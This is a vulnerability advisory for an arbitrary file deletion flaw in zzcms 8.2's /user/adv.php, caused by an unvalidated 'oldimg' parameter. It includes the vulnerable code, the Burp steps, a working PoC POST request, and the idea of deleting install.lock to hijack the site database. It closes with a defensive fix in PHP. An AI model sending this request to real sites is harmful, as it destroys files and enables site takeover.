
user/adv.php

## Edition:

zzcms 8.2

/user/adv.php

Code

```php
if ($oldimg<>$img){
	$f="../".$oldimg;
	if (file_exists($f)){
		unlink($f);
	}
}
```

Line: 80

Harm

Allows attackers to delete files arbitrarily

Cause

The code shows that oldimg is under our control: it is prefixed with "../" and passed to unlink() without any validation.

The script checks the account identity. To exploit the vulnerability, the account must have been registered with the company identity.

Create a flag.php file in the test environment.

Then intercept the POST request with Burp and change oldimg to flag.php.

The flag.php file is successfully deleted.

PoC

POST /user/adv.php?action=modify

POST data:

adv=123&advlink=%2Fzt%2Fshow.php%3Fid%3D2&company=%E4%BD%A0%E5%A5%BD%E5%95%8A&oldimg=flag.php&img=&Submit22=%E4%BF%AE+%E6%94%B9

An attacker can use this vulnerability to delete any file, for example deleting install.lock to trigger a CMS reinstall and hijack the website database.

Solution

Filter the user-controlled input parameters, and strictly restrict the parameter type and the file suffix.
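One way to apply that fix, as an added example that is not zzcms code: the function name `safe_delete_image()`, the suffix allow-list and the `uploads` directory layout are assumptions made for illustration. It enforces the suffix restriction and also confirms that the resolved path stays inside the upload directory before calling unlink().

```php
<?php
// Added example, not zzcms code. safe_delete_image() and the directory
// layout used in the demo are hypothetical.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

function safe_delete_image(string $uploadDir, string $userPath): bool
{
    $base = realpath($uploadDir);
    if ($base === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return false;
    }
    // Suffix allow-list: only image files may ever be removed.
    $ext = strtolower(pathinfo($userPath, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return false;
    }
    // realpath() resolves "../" and symlinks; false means no such file.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return false;
    }
    // Containment: the resolved path must still sit under the upload directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return unlink($target);
}

// Constructed demo: a throwaway web root with an upload directory.
$root = sys_get_temp_dir() . '/adv_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/flag.php", '<?php // constructed');
file_put_contents("$root/install.jpg", 'x');   // image suffix, outside uploads
file_put_contents("$root/uploads/old.jpg", 'x');

// Case 1: traversal to a non-image file (stopped by the suffix check).
var_dump(safe_delete_image("$root/uploads", '../flag.php'));
// Case 2: traversal to a file with an allowed suffix (stopped by containment).
var_dump(safe_delete_image("$root/uploads", '../install.jpg'));
// Case 3: a legitimate old image inside the upload directory.
var_dump(safe_delete_image("$root/uploads", 'old.jpg'));
// The file targeted in case 1 is still present.
var_dump(file_exists("$root/flag.php"));
```

A stricter design does not accept the old image path from the request at all and instead reads it from the stored record of the logged-in account.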
